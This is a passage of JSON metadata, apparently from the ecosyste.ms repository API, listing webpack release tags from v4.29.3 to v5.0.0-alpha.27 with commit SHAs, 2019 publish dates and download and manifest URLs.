rl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r